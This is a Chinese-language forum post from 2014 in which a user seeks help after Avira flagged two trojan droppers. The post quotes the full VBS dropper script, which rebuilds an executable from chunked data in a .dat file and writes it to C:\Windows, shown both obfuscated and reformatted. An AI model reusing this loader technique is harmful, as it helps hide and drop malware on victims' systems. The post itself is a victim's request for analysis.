防毒軟體：Avira Free Antivirus 14.0.7.342 剛剛無預警的掃描到兩隻病毒，這段期間都在瀏覽網頁，有沒有鄉民可以看出， 這兩隻病毒是透過什麼管道進來的，假設中鏢會影響哪些層面。謝謝 C:\Windows\871252.exe [偵測] 是 TR/Dropper.Gen 特洛伊木馬程式 C:\Windows\611620.exe [偵測] 是 TR/Dropper.Gen 特洛伊木馬程式 隔離後去該路徑下發現同檔名有兩隻 611620.vbs 611620.dat 871252.vbs 871252.dat vbs內容如下 oN ErRoR rEsuME next:V=1515:SeT q=cReATEobjeCt("SCRIptiNG.fILesystEMoBJecT"):Do WhILE Q.fILeexISts("C:\windows\871252.dat")=faLse:WscRIpt.SleEP(776):lOop:Do:set H=q.OPENTexTfIle("C:\windows\871252.dat",1):Do wHILe h.AtenDofsTreAm=fAlSe:R=h.REaDLIne:D=LEn(r):X=left(r,4):sELECt casE trUe:caSE IsnuMeriC(X)=FalsE:case D=3982 aNd x=CSTr(V):J=j+MiD(R,5,3977):v=V+1:cAsE D=3951 ANd x=CstR(V):j=J+mID(R,5,3946):V=v+1:enD SELECT:LOOP:H.closE:If 1618=v THen:C=lEN(j)/2:sEt e=CReAteoBJeCT("aDoDB.reCoRdseT"):E.FIeLDS.APpEnd "M",205,C:E.OpeN:e.adDNew:e.updaTe:e("m")=j:set Z=CreaTeobjECT("AdOdB.stReAm"):WITh z:.MODE=3:.TYPe=1:.open():.WRite E("M").geTChuNk(c):.savetofiLE "C:\windows\871252.exe",2:END With:wSCRIPT.quiT:eND if:WsCrIpT.slEep(481):LOop 自己重新整理過內容應該會比較好分析 on error resume next v=1515 set q=createobject("scripting.filesystemobject") do while q.fileexists("c:\windows\871252.dat")=false wscript.sleep(776) loop do set h=q.opentextfile("c:\windows\871252.dat",1) do while h.atendofstream=false r=h.readline d=len(r) x=left(r,4) select case true case isnumeric(x)=false case d=3982 and x=cstr(v) j=j+mid(r,5,3977) v=v+1 case d=3951 and x=cstr(v) j=j+mid(r,5,3946) v=v+1 end select loop h.close if 1618=v then c=len(j)/2 set e=createobject("adodb.recordset") e.fields.append "m",205,c e.open e.addnew e.update e("m")=j set z=createobject("adodb.stream") with z .mode=3 .type=1 .open() .write e("m").getchunk(c) .savetofile "c:\windows\871252.exe",2 end with wscript.quit end if wscript.sleep(481) loop -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 59.104.150.7 ※ 文章網址: http://www.ptt.cc/bbs/AntiVirus/M.1417699636.A.F5B.html ※ 編輯: piligo (59.104.150.7), 12/04/2014 21:27:55